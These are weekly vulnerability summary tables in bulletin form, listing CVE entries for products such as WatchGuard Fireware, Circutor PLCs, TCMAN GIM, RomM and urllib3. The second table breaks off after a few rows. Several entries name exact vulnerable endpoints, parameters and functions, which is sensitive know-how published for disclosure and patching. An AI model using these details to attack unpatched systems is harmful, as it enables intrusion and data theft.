| rommapp--romm | RomM (ROM Manager) allows users to scan, enrich, browse and play their game collections with a clean and responsive interface. Prior to 4.4.1 and 4.4.1-beta.2, users can read private collections / smart collections belonging to other users by directly accessing their IDs via API. No ownership verification is performed, and the collection's public/private status is not checked, before collection data is returned. This vulnerability is fixed in 4.4.1 and 4.4.1-beta.2. | 2025-12-03 | not yet calculated | CVE-2025-65096 | https://github.com/rommapp/romm/security/advisories/GHSA-5ghc-8wr3-788c |
| rommapp--romm | RomM (ROM Manager) allows users to scan, enrich, browse and play their game collections with a clean and responsive interface. Prior to 4.4.1 and 4.4.1-beta.2, an Authenticated User can delete collections belonging to other users by directly sending a DELETE request to the collection endpoint. No ownership verification is performed before deleting collections. This vulnerability is fixed in 4.4.1 and 4.4.1-beta.2. | 2025-12-03 | not yet calculated | CVE-2025-65097 | https://github.com/rommapp/romm/security/advisories/GHSA-v7c8-f6xc-rv9g |
| Sanoma--Clickedu | Reflected Cross-site Scripting (XSS) vulnerability in Sanoma's Clickedu. This vulnerability allows an attacker to execute JavaScript code in the victim's browser by sending them a malicious URL in '/students/carpetes_varies.php'. This vulnerability can be exploited to steal sensitive user data, such as session cookies, or to perform actions on behalf of the user. | 2025-12-01 | not yet calculated | CVE-2025-41070 | https://www.incibe.es/en/incibe-cert/notices/aviso/reflected-cross-site-scripting-xss-sanomas-clickedu |
| Seafile--Seafile | A stored Cross-Site Scripting (XSS) vulnerability has been found in Seafile v12.0.10. This vulnerability allows an attacker to execute arbitrary code in the victim's browser by storing malicious payloads with the PUT parameter 'name' in '/api/v2.1/user/'. | 2025-12-04 | not yet calculated | CVE-2025-41079 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-seafile |
| Seafile--Seafile | A stored Cross-Site Scripting (XSS) vulnerability has been found in Seafile v12.0.10. This vulnerability allows an attacker to execute arbitrary code in the victim's browser by storing malicious payloads with the POST parameter 'p' in '/api/v2.1/repos/{repo_id}/file/'. | 2025-12-04 | not yet calculated | CVE-2025-41080 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-seafile |
| SGE-PLC1000 SGE-PLC50--Circutor | Stack-based buffer overflow in Circutor SGE-PLC1000/SGE-PLC50 v0.9.2. This vulnerability allows an attacker to remotely exploit memory corruption through the 'read_packet()' function of the TACACSPLUS implementation. | 2025-12-02 | not yet calculated | CVE-2025-11778 | https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-circutor-products-0 |
| SGE-PLC1000 SGE-PLC50--Circutor | Stack-based buffer overflow vulnerability in Circutor SGE-PLC1000/SGE-PLC50 v9.0.2. The 'SetLan' function is invoked when a new configuration is applied. This new configuration function is activated by a management web request, which can be invoked by a user when making changes to the 'index.cgi' web application. The parameters are not being sanitised, which could lead to command injection. | 2025-12-02 | not yet calculated | CVE-2025-11779 | https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-circutor-products-0 |
| SGE-PLC1000 SGE-PLC50--Circutor | Stack-based buffer overflow vulnerability in Circutor SGE-PLC1000/SGE-PLC50 v9.0.2. In the 'showMeterReport()' function, there is an unlimited user input that is copied to a fixed-size buffer via 'sprintf()'. The 'GetParameter(meter)' function retrieves the user input, which is directly incorporated into a buffer without size validation. An attacker can provide an excessively large input for the "meter" parameter. | 2025-12-02 | not yet calculated | CVE-2025-11780 | https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-circutor-products-0 |
| SGE-PLC1000 SGE-PLC50--Circutor | Use of hardcoded cryptographic keys in Circutor SGE-PLC1000/SGE-PLC50 v9.0.2. The affected firmware contains a hardcoded static authentication key. An attacker with local access to the device can extract this key (e.g., by analysing the firmware image or memory dump) and create valid firmware update packages. This bypasses all intended access controls and grants full administrative privileges. | 2025-12-02 | not yet calculated | CVE-2025-11781 | https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-circutor-products-0 |
| SGE-PLC1000 SGE-PLC50--Circutor | Stack-based buffer overflow vulnerability in Circutor SGE-PLC1000/SGE-PLC50 v9.0.2. The 'ShowDownload()' function uses "sprintf()" to format a string that includes the user-controlled input of 'GetParameter(meter)' in the fixed-size buffer 'acStack_4c' (64 bytes) without checking the length. An attacker can provide an excessively long value for the 'meter' parameter that exceeds the 64-byte buffer size. | 2025-12-02 | not yet calculated | CVE-2025-11782 | https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-circutor-products-0 |
| SGE-PLC1000 SGE-PLC50--Circutor | Stack-based buffer overflow vulnerability in Circutor SGE-PLC1000/SGE-PLC50 v9.0.2. The vulnerability is found in the 'AddEvent()' function when copying the user-controlled username input to a fixed-size buffer (48 bytes) without boundary checking. This can lead to memory corruption, resulting in possible remote code execution. | 2025-12-02 | not yet calculated | CVE-2025-11783 | https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-circutor-products-0 |
| SGE-PLC1000 SGE-PLC50--Circutor | Stack-based buffer overflow vulnerability in Circutor SGE-PLC1000/SGE-PLC50 v9.0.2. In the 'ShowMeterDatabase()' function, there is an unlimited user input that is copied to a fixed-size buffer via 'sprintf()'. The 'GetParameter(meter)' function retrieves the user input, which is directly incorporated into a buffer without size validation. An attacker can provide an excessively large input for the 'meter' parameter. | 2025-12-02 | not yet calculated | CVE-2025-11784 | https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-circutor-products-0 |
| SGE-PLC1000 SGE-PLC50--Circutor | Stack-based buffer overflow vulnerability in Circutor SGE-PLC1000/SGE-PLC50 v9.0.2. In the 'ShowMeterPasswords()' function, there is an unlimited user input that is copied to a fixed-size buffer via 'sprintf()'. The 'GetParameter(meter)' function retrieves the user input, which is directly incorporated into a buffer without size validation. An attacker can provide an excessively large input for the 'meter' parameter. | 2025-12-02 | not yet calculated | CVE-2025-11785 | https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-circutor-products-0 |
| SGE-PLC1000 SGE-PLC50--Circutor | Stack-based buffer overflow vulnerability in Circutor SGE-PLC1000/SGE-PLC50 v9.0.2. In the 'SetUserPassword()' function, the 'newPassword' parameter is directly embedded in a shell command string using 'sprintf()' without any sanitisation or validation, and then executed using 'system()'. This allows an attacker to inject arbitrary shell commands that will be executed with the same privileges as the application. | 2025-12-02 | not yet calculated | CVE-2025-11786 | https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-circutor-products-0 |
| SGE-PLC1000 SGE-PLC50--Circutor | Command injection vulnerability in the operating system in Circutor SGE-PLC1000/SGE-PLC50 v9.0.2 through the 'GetDNS()', 'CheckPing()' and 'TraceRoute()' functions. | 2025-12-02 | not yet calculated | CVE-2025-11787 | https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-circutor-products-0 |
| SGE-PLC1000 SGE-PLC50--Circutor | Heap-based buffer overflow vulnerability in Circutor SGE-PLC1000/SGE-PLC50 v9.0.2. In the 'ShowSupervisorParameters()' function, there is an unlimited user input that is copied to a fixed-size buffer via 'sprintf()'. The 'GetParameter(meter)' function retrieves the user input, which is directly incorporated into a buffer without size validation. An attacker can provide an excessively large input for the 'meter' parameter. | 2025-12-02 | not yet calculated | CVE-2025-11788 | https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-circutor-products-0 |
| SGE-PLC1000 SGE-PLC50--Circutor | Out-of-bounds read vulnerability in Circutor SGE-PLC1000/SGE-PLC50 v9.0.2. The 'DownloadFile' function converts a parameter to an integer using 'atoi()' and then uses it as an index in the 'FilesDownload' array with '(&FilesDownload)[iVar2]'. If the parameter is too large, it will access memory beyond the limits. | 2025-12-02 | not yet calculated | CVE-2025-11789 | https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-circutor-products-0 |
| silabs.com--Gecko SDK | When a WF200/WGM160P device is configured to operate as an Access Point, it may be vulnerable to a denial of service triggered by a malformed packet. The device may recover automatically or require a hard reset. | 2025-12-04 | not yet calculated | CVE-2025-12986 | https://community.silabs.com/068Vm00000akaGr |
| silabs.com--Simplicity Studio V6 | The web interface of the Silicon Labs Simplicity Device Manager is exposed publicly and can be used to extract the NTLMv2 hash which an attacker could use to crack the user's domain password. | 2025-12-04 | not yet calculated | CVE-2025-10285 | https://community.silabs.com/a45Vm0000003UcfIAE |
| SOLIDserver--SOLIDserver IPAM | Directory traversal vulnerability in SOLIDserver IPAM v8.2.3. This vulnerability allows an authenticated user with administrator privileges to list directories other than those to which they have authorized access using the 'directory' parameter in '/mod/ajax.php?action=sections/list/list'. For example, setting the 'directory' parameter to '/' displays files outside the 'LOCAL:///' folder. | 2025-12-02 | not yet calculated | CVE-2025-13879 | https://www.incibe.es/en/incibe-cert/notices/aviso/directory-traversal-vulnerability-efficientips-solidserver-ipam https://efficientip.com/resources/solidserver-ipam-solutions-3/ |
| SolisCloud--Monitoring Platform (Cloud API & Device Control API) | The SolisCloud API suffers from a Broken Access Control vulnerability, specifically an Insecure Direct Object Reference (IDOR), where any authenticated user can access detailed data of any plant by altering the plant_id in the request. | 2025-12-04 | not yet calculated | CVE-2025-13932 | url |
| Sonatype--Nexus Repository | Due to a regression introduced in version 3.83.0, a security header is no longer applied to certain user-uploaded content served from repositories. This may allow an authenticated attacker with repository upload privileges to exploit a stored cross-site scripting (XSS) vulnerability with user context. | 2025-12-04 | not yet calculated | CVE-2025-13488 | https://help.sonatype.com/en/sonatype-nexus-repository-3-87-0-release-notes.html https://support.sonatype.com/hc/en-us/articles/46896142768019 |
| Sony Corporation--INZONE Hub | The installer of INZONE Hub 1.0.10.3 to 1.0.17.0 contains an issue with the DLL search path, which may lead to insecurely loading Dynamic Link Libraries. As a result, arbitrary code may be executed with the privilege of the user invoking the installer. | 2025-12-01 | not yet calculated | CVE-2025-64772 | https://www.sony.com/electronics/support/others-software/inzone-hub https://jvn.jp/en/jp/JVN28247549/ |
| syntax-tree--mdast-util-to-hast | mdast-util-to-hast is an mdast utility to transform to hast. From 13.0.0 to before 13.2.1, multiple (unprefixed) classnames could be added in markdown source by using character references. This could make rendered user supplied markdown code elements appear like the rest of the page. This vulnerability is fixed in 13.2.1. | 2025-12-01 | not yet calculated | CVE-2025-66400 | https://github.com/syntax-tree/mdast-util-to-hast/security/advisories/GHSA-4fh9-h7wg-q85m https://github.com/syntax-tree/mdast-util-to-hast/commit/6fc783ae6abdeb798fd5a68e7f3f21411dde7403 https://github.com/syntax-tree/mdast-util-to-hast/commit/ab3a79570a1afbfa7efef5d4a0cd9b5caafbc5d7 |
| taikoxyz--taiko-mono | Taiko Alethia is an Ethereum-equivalent, permissionless, based rollup designed to scale Ethereum without compromising its fundamental properties. In 2.3.1 and earlier, TaikoInbox._verifyBatches (packages/protocol/contracts/layer1/based/TaikoInbox.sol:627-678) advanced the local tid to whatever transition matched the current blockHash before knowing whether that batch would actually be verified. When the loop later broke (e.g., cooldown window not yet passed or transition invalidated), the function still wrote that newer tid into batches[lastVerifiedBatchId].verifiedTransitionId after decrementing batchId. Result: the last verified batch could end up pointing at a transition index from the next batch (often zeroed), corrupting the verified chain pointer. | 2025-12-04 | not yet calculated | CVE-2025-66559 | https://github.com/taikoxyz/taiko-mono/security/advisories/GHSA-5mxh-r33p-6h5x https://github.com/taikoxyz/taiko-mono/commit/379f5cb4ffe9e1945563ab2c7740bc9f4ea004d8 |
| TCMAN--GIM | Unauthorized access vulnerability in TCMAN GIM v11 version 20250304. This vulnerability allows an unauthenticated attacker to determine whether a user exists on the system by using the 'pda:userId' and 'pda:newPassword' parameters with 'soapaction UnlockUser' in '/WS/PDAWebService.asmx'. | 2025-12-02 | not yet calculated | CVE-2025-41012 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-tcman-gim-2 |
| TCMAN--GIM | SQL injection vulnerability in TCMAN GIM v11 in version 20250304. This vulnerability allows an attacker to retrieve, create, update, and delete databases by sending a GET request using the 'idmant' parameter in '/PC/frmEPIS.aspx'. | 2025-12-02 | not yet calculated | CVE-2025-41013 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-tcman-gim-2 |
| TCMAN--GIM | User Enumeration Vulnerability in TCMAN GIM v11 version 20250304. This vulnerability allows an unauthenticated attacker to determine whether a user exists on the system. The vulnerability is exploitable through the 'pda:username' parameter with 'soapaction GetLastDatePasswordChange' in '/WS/PDAWebService.asmx'. | 2025-12-02 | not yet calculated | CVE-2025-41014 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-tcman-gim-2 |
| TCMAN--GIM | User Enumeration Vulnerability in TCMAN GIM v11 version 20250304. This vulnerability allows an unauthenticated attacker to determine whether a user exists on the system. The vulnerability is exploitable through the 'pda:username' parameter with 'soapaction GetUserQuestionAndAnswer' in '/WS/PDAWebService.asmx'. | 2025-12-02 | not yet calculated | CVE-2025-41015 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-tcman-gim-2 |
| The Qt Company--Qt | Allocation of Resources Without Limits or Throttling, Improper Validation of Specified Quantity in Input vulnerability in The Qt Company Qt on Windows, MacOS, Linux, iOS, Android, x86, ARM, 64 bit, 32 bit allows Excessive Allocation. This issue affects users of the Text component in Qt Quick. Missing validation of the width and height in the <img> tag could cause an application to become unresponsive. This issue affects Qt: from 5.0.0 through 6.5.10, from 6.6.0 through 6.8.5, from 6.9.0 through 6.10.0. | 2025-12-03 | not yet calculated | CVE-2025-12385 | https://codereview.qt-project.org/c/qt/qtdeclarative/+/687239 https://codereview.qt-project.org/c/qt/qtdeclarative/+/687766 |
| TOTOLINK--N300RT | TOTOLINK N300RT wireless router firmware versions prior to V3.4.0-B20250430 (discovered in V2.1.8-B20201030.1539) contain an OS command injection vulnerability in the Boa formWsc handling functionality. An unauthenticated attacker can send specially crafted requests to trigger command execution via the targetAPSsid request parameter. | 2025-12-03 | not yet calculated | CVE-2025-34319 | https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/154/ids/36.html https://totolink.tw/support_view/N300RT https://www.vulncheck.com/advisories/totolink-n300rt-boa-formwsc-rce |
| Unknown--db-access | The db-access WordPress plugin through 0.8.7 does not have authorization in an AJAX action, allowing any authenticated user, such as a subscriber, to perform SQL injection attacks. | 2025-12-02 | not yet calculated | CVE-2025-13000 | https://wpscan.com/vulnerability/aec53f87-6500-4c8a-925a-146be61bbabf/ |
| Unknown--donation | The donation WordPress plugin through 1.0 does not sanitize and escape a parameter before using it in a SQL statement, allowing high-privilege users, such as admin, to perform SQL injection attacks. | 2025-12-02 | not yet calculated | CVE-2025-13001 | https://wpscan.com/vulnerability/4e7a8154-46bf-44c9-ad9a-273e99ae2104/ |
| Unknown--Timetable and Event Schedule by MotoPress ver. < 2.4.16 | The Timetable and Event Schedule by MotoPress WordPress plugin before 2.4.16 does not verify that a user has access to a specific event when duplicating it, leading to arbitrary event disclosure to users with a role as low as Contributor. | 2025-12-03 | not yet calculated | CVE-2025-12954 | https://wpscan.com/vulnerability/f15dd1ca-aa40-4d3b-9625-e3ace744374d/ |
| Unknown--UNA CMS ver 9.0.0 | UNA CMS versions 9.0.0-RC1 - 14.0.0-RC4 contain a PHP object injection vulnerability in BxBaseMenuSetAclLevel.php where the profile_id POST parameter is passed to PHP unserialize() without proper handling, allowing remote, unauthenticated attackers to inject arbitrary PHP objects and potentially write and execute arbitrary PHP code. | 2025-12-04 | not yet calculated | CVE-2025-66571 | ExploitDB-52139 UNA CMS Homepage UNA CMS GitHub Repository Karma Security Advisory https://www.vulncheck.com/advisories/una-cms-900-rc1-1400-rc4-php-object-injection |
| Unknown--Upload.am plugin ver. < 1.0.1 | The Upload.am WordPress plugin before 1.0.1 is vulnerable to arbitrary option disclosure due to a missing capability check on its AJAX request handler, allowing users such as contributor to view site options. | 2025-12-02 | not yet calculated | CVE-2025-12630 | https://wpscan.com/vulnerability/531537f1-5547-4b0f-9e11-3f8a0b2589f5/ |
| urllib3--urllib3 | urllib3 is a user-friendly HTTP client library for Python. Starting in version 1.24 and prior to 2.6.0, the number of links in the decompression chain was unbounded allowing a malicious server to insert a virtually unlimited number of compression steps leading to high CPU usage and massive memory allocation for the decompressed data. This vulnerability is fixed in 2.6.0. | 2025-12-05 | not yet calculated | CVE-2025-66418 | https://github.com/urllib3/urllib3/security/advisories/GHSA-gm62-xv2j-4w53 https://github.com/urllib3/urllib3/commit/24d7b67eac89f94e11003424bcf0d8f7b72222a8 |
| urllib3--urllib3 | urllib3 is a user-friendly HTTP client library for Python. Starting in version 1.0 and prior to 2.6.0, the Streaming API improperly handles highly compressed data. urllib3's streaming API is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once. When streaming a compressed response, urllib3 can perform decoding or decompression based on the HTTP Content-Encoding header (e.g., gzip, deflate, br, or zstd). The library must read compressed data from the network and decompress it until the requested chunk size is met. Any resulting decompressed data that exceeds the requested amount is held in an internal buffer for the next read operation. The decompression logic could cause urllib3 to fully decode a small amount of highly compressed data in a single operation. This can result in excessive resource consumption (high CPU usage and massive memory allocation for the decompressed data). | 2025-12-05 | not yet calculated | CVE-2025-66471 | https://github.com/urllib3/urllib3/security/advisories/GHSA-2xpw-w6gg-jr37 https://github.com/urllib3/urllib3/commit/c19571de34c47de3a766541b041637ba5f716ed7 |
| VeePN--VeeVPN | VeeVPN 1.6.1 contains an unquoted service path vulnerability in the VeePNService that allows remote attackers to execute code during startup or reboot with escalated privileges. Attackers can exploit this by providing a malicious service name, allowing them to inject commands and run as LocalSystem. | 2025-12-04 | not yet calculated | CVE-2025-66575 | ExploitDB-52088 VeePN Homepage VeePN GitHub Repository https://www.vulncheck.com/advisories/veevpn-161-unquoted-service-path-remote-code-execution |
| WatchGuard--Fireware OS | A memory corruption vulnerability in WatchGuard Fireware OS may allow an unauthenticated attacker to trigger a Denial of Service (DoS) condition in the Mobile User VPN with IKEv2 and the Branch Office VPN using IKEv2 when configured with a dynamic gateway peer. This vulnerability affects Fireware OS 12.0 up to and including 12.11.4 and 2025.1 up to and including 2025.1.2. | 2025-12-04 | not yet calculated | CVE-2025-11838 | https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00018 |
| WatchGuard--Fireware OS | An Out-of-bounds Write vulnerability in WatchGuard Fireware OS's certificate request command could allow an authenticated privileged user to execute arbitrary code via specially crafted CLI commands. This vulnerability affects Fireware OS 12.0 up to and including 12.11.4, 12.5 up to and including 12.5.13, and 2025.1 up to and including 2025.1.2. | 2025-12-04 | not yet calculated | CVE-2025-12026 | https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00017 |
| WatchGuard--Fireware OS | An Out-of-bounds Write vulnerability in WatchGuard Fireware OS's CLI could allow an authenticated privileged user to execute arbitrary code via specially crafted IPSec configuration CLI commands. This vulnerability affects Fireware OS 11.0 up to and including 11.12.4+541730, 12.0 up to and including 12.11.4, 12.5 up to and including 12.5.13, and 2025.1 up to and including 2025.1.2. | 2025-12-04 | not yet calculated | CVE-2025-12195 | https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00019 |
| WatchGuard--Fireware OS | An Out-of-bounds Write vulnerability in WatchGuard Fireware OS's CLI could allow an authenticated privileged user to execute arbitrary code via a specially crafted CLI command. This vulnerability affects Fireware OS 12.0 up to and including 12.11.4, 12.5 up to and including 12.5.13, and 2025.1 up to and including 2025.1.2. | 2025-12-04 | not yet calculated | CVE-2025-12196 | https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00020 |
| WatchGuard--Fireware OS | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WatchGuard Fireware OS (Tigerpaw Technology Integration module) allows Stored XSS. This issue affects Fireware OS 12.4 up to and including 12.11.4, 12.5 up to and including 12.5.13, and 2025.1 up to and including 2025.1.2. | 2025-12-04 | not yet calculated | CVE-2025-13936 | https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00021 |
| WatchGuard--Fireware OS | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WatchGuard Fireware OS (ConnectWise Technology Integration module) allows Stored XSS. This issue affects Fireware OS 12.4 up to and including 12.11.4, 12.5 up to and including 12.5.13, and 2025.1 up to and including 2025.1.2. | 2025-12-04 | not yet calculated | CVE-2025-13937 | https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00022 |
| WatchGuard--Fireware OS | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WatchGuard Fireware OS (Autotask Technology Integration module) allows Stored XSS. This issue affects Fireware OS 12.4 up to and including 12.11.4, 12.5 up to and including 12.5.13, and 2025.1 up to and including 2025.1.2. | 2025-12-04 | not yet calculated | CVE-2025-13938 | https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00023 |
| WatchGuard--Fireware OS | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WatchGuard Fireware OS (Gateway Wireless Controller module) allows Stored XSS. This issue affects Fireware OS 11.7.2 up to and including 11.12.4+541730, 12.0 up to and including 12.11.4, 12.5 up to and including 12.5.13, and 2025.1 up to and including 2025.1.2. | 2025-12-04 | not yet calculated | CVE-2025-13939 | https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00024 |
| WatchGuard--Fireware OS | An Expected Behavior Violation [CWE-440] vulnerability in WatchGuard Fireware OS may allow an attacker to bypass the Fireware OS boot time system integrity check and prevent the Firebox from shutting down in the event of a system integrity check failure. The on-demand system integrity check in the Fireware Web UI will correctly show a failed system integrity check message in the event of a failure. This issue affects Fireware OS: from 12.8.1 through 12.11.4, from 2025.1 through 2025.1.2. | 2025-12-04 | not yet calculated | CVE-2025-13940 | https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00026 |
| WatchGuard--Fireware OS | An XPath Injection vulnerability in WatchGuard Fireware OS may allow a remote unauthenticated attacker to retrieve sensitive information from the Firebox configuration through an exposed authentication or management web interface. This vulnerability only affects Firebox systems that have at least one authentication hotspot configured. This issue affects Fireware OS 11.11 up to and including 11.12.4+541730, 12.0 up to and including 12.11.4, 12.5 up to and including 12.5.13, and 2025.1 up to and including 2025.1.2. | 2025-12-04 | not yet calculated | CVE-2025-1545 | https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00025 |
| WatchGuard--Fireware OS | A stack-based buffer overflow vulnerability [CWE-121] in WatchGuard Fireware OS's certificate request command could allow an authenticated privileged user to execute arbitrary code via specially crafted CLI commands. This issue affects Fireware OS: from 12.0 through 12.5.12+701324, from 12.6 through 12.11.2. | 2025-12-04 | not yet calculated | CVE-2025-1547 | https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00013 |
| WatchGuard--Fireware OS | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WatchGuard Fireware OS allows Stored XSS via the IPS module. This vulnerability requires an authenticated administrator session to a locally managed Firebox. This issue affects Firebox: from 12.0 through 12.11.2. | 2025-12-04 | not yet calculated | CVE-2025-6946 | https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00011 |
| WatchGuard--Mobile VPN with SSL Client | The WatchGuard Mobile VPN with SSL Client on Windows allows a locally authenticated non-administrative Windows user to escalate their privileges to NT AUTHORITY/SYSTEM on the Windows machine where the VPN Client is installed. This issue affects the Mobile VPN with SSL Client 12.0 up to and including 12.11.2. | 2025-12-04 | not yet calculated | CVE-2025-1910 | https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00008 |
| WEBIGniter--WEBIGniter | WEBIGniter 28.7.23 contains a cross-site scripting vulnerability in the user creation process that allows unauthenticated attackers to execute malicious JavaScript code, enabling potential XSS attacks. | 2025-12-04 | not yet calculated | CVE-2023-53735 | ExploitDB-51900 Official WEBIGniter Homepage WEBIGniter Demo Page https://www.vulncheck.com/advisories/webigniter-28723-cross-site-scripting-xss-in-user-creation-process |
| xwiki--xwiki-platform | XWiki is an open-source wiki software platform. From 16.7.0 to 16.10.11, 17.4.4, or 17.7.0, in an instance which is using the XWiki Jetty package (XJetty), a context is exposed that allows static access to any file located in the webapp/ folder. It allows accessing files which might contain credentials. Fixed in 16.10.11, 17.4.4, and 17.7.0. | 2025-12-01 | not yet calculated | CVE-2025-55749 | https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-53gx-j3p6-2rw9 https://github.com/xwiki/xwiki-platform/commit/42fb063749dd88cc78196f72d7318b7179285ebd https://github.com/xwiki/xwiki-platform/commit/99a04a0e2143583f5154a43e02174155da7e8e10 https://github.com/xwiki/xwiki-platform/compare/8b68d8a70b43f25391b3ee48477d7eb71b95cf4b...99a04a0e2143583f5154a43e02174155da7e8e10 https://jira.xwiki.org/browse/XWIKI-23438 |
| yawkat--lz4-java | yawkat LZ4 Java provides LZ4 compression for Java. Insufficient clearing of the output buffer in Java-based decompressor implementations in lz4-java 1.10.0 and earlier allows remote attackers to read previous buffer contents via crafted compressed input. In applications where the output buffer is reused without being cleared, this may lead to disclosure of sensitive data. JNI-based implementations are not affected. This vulnerability is fixed in 1.10.1. | 2025-12-05 | not yet calculated | CVE-2025-66566 | https://github.com/yawkat/lz4-java/security/advisories/GHSA-cmp6-m4wj-q63q https://github.com/yawkat/lz4-java/commit/33d180cb70c4d93c80fb0dc3ab3002f457e93840 |
| Zabbix--Zabbix | An authenticated Zabbix Super Admin can exploit the oauth.authorize action to read arbitrary files from the webserver leading to potential confidentiality loss. | 2025-12-01 | not yet calculated | CVE-2025-27232 | https://support.zabbix.com/browse/ZBX-27282 |
| Zabbix--Zabbix | Library loading on AIX Zabbix Agent builds can be hijacked by local users with write access to the /home/cecuser directory. | 2025-12-01 | not yet calculated | CVE-2025-49642 | https://support.zabbix.com/browse/ZBX-27283 |
| Zabbix--Zabbix | An authenticated Zabbix user (including Guest) is able to cause disproportionate CPU load on the webserver by sending specially crafted parameters to /imgstore.php, leading to potential denial of service. | 2025-12-01 | not yet calculated | CVE-2025-49643 | https://support.zabbix.com/browse/ZBX-27284 |
Vulnerability Summary for the Week of November 24, 2025
Posted on Monday December 01, 2025
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| 0x4m4--HexStrike AI | By providing a command-line argument starting with a semi-colon ; to an API endpoint created by the EnhancedCommandExecutor class of the HexStrike AI MCP server, the resultant composed command is executed directly in the context of the MCP server's normal privilege; typically, this is root. There is no attempt to sanitize these arguments in the default configuration of this MCP server at the affected version (as of commit 2f3a5512 in September of 2025). | 2025-11-30 | 9.1 | CVE-2025-35028 | https://takeonme.org/gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000000111111111111111111111111000000000000000000000000000000000000000000000000000000011 |
| AMD--AMD uProf | Improper return value within AMD uProf can allow a local attacker to bypass KASLR, potentially resulting in loss of confidentiality or availability. | 2025-11-24 | 7.1 | CVE-2025-48510 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-9019.html |
| AMD--Xilinx Run Time (XRT) | Improper input validation within the XOCL driver may allow a local attacker to generate an integer overflow condition, potentially resulting in loss of confidentiality or availability. | 2025-11-24 | 8 | CVE-2025-52538 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-8014.html |
| AMD--Xilinx Run Time (XRT) | Inadequate lock protection within Xilinx Run Time may allow a local attacker to trigger a Use-After-Free condition, potentially resulting in loss of confidentiality or availability. | 2025-11-24 | 7.3 | CVE-2025-0003 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-8014.html |
| AMD--Xilinx Run Time (XRT) | Improper input validation within the XOCL driver may allow a local attacker to generate an integer overflow condition, potentially resulting in crash or denial of service. | 2025-11-24 | 7.3 | CVE-2025-0005 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-8014.html |
| AMD--Xilinx Run Time (XRT) | A buffer overflow with Xilinx Run Time Environment may allow a local attacker to read or corrupt data from the advanced extensible interface (AXI), potentially resulting in loss of confidentiality, integrity, and/or availability. | 2025-11-24 | 7.3 | CVE-2025-52539 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-8014.html |
| ASR--Lapwing_Linux | Out-of-bounds Read vulnerability in ASR1903 and ASR3901 in ASR Lapwing_Linux on Linux (nr_fw modules). This vulnerability is associated with the program file Code/nr_fw/DLP/src/NrCgi.C. This issue affects Lapwing_Linux: before 2025/11/26. | 2025-11-26 | 7.4 | CVE-2025-13735 | https://www.asrmicro.com/en/goods/psirt?cid=41 |
| blubrry--PowerPress Podcasting plugin by Blubrry | The Blubrry PowerPress plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in all versions up to, and including, 11.15.2. This is due to the plugin validating file extensions but not halting execution when validation fails in the 'powerpress_edit_post' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2025-11-27 | 8.8 | CVE-2025-13536 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d420ee49-e7b3-43d8-a263-8a93abd1133c?source=cve https://plugins.trac.wordpress.org/browser/powerpress/tags/11.14.1/powerpressadmin.php#L3068 https://plugins.trac.wordpress.org/browser/powerpress/tags/11.14.1/powerpressadmin.php#L3012 https://plugins.trac.wordpress.org/browser/powerpress/tags/11.14.1/powerpressadmin.php#L2368 https://plugins.trac.wordpress.org/changeset/3402635/ |
